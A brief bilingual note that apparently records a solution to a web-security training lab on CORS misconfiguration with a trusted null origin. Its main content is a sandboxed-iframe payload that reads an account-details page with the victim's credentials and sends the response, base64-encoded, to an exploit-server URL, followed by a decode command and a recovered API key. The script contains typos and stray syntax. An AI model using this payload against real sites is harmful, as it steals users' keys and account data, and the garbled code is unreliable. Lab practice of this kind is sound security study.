CORS — origine null considérée comme fiable
CORS vulnerability with trusted null origin




Mis à jour




Mis à jour
<iframe sandbox="allow-scripts" srcdoc="<<script>
varrreq = new XMLHttpRequest();
req.onload = function() {
location = "https://exploit-0a3a00ab047b89dd8023021101ef0012.exploit-server.net/?apikey=" + btoa(req.responseText);
);
req.open("GET", "https://0a280071045626f880090316003b0053.web-security-academy.net/accountDetails", true);
req.withCredentials = true;
req.send();
</script>"></iframe>echo "NkhBVGdaVWdUb0t2QU5PbXNzanRyY1pDRlpUQUVFYjk=" | base64 -d; echo
6HATgZUgToKvANOmssjtrcZCFZTAEEb9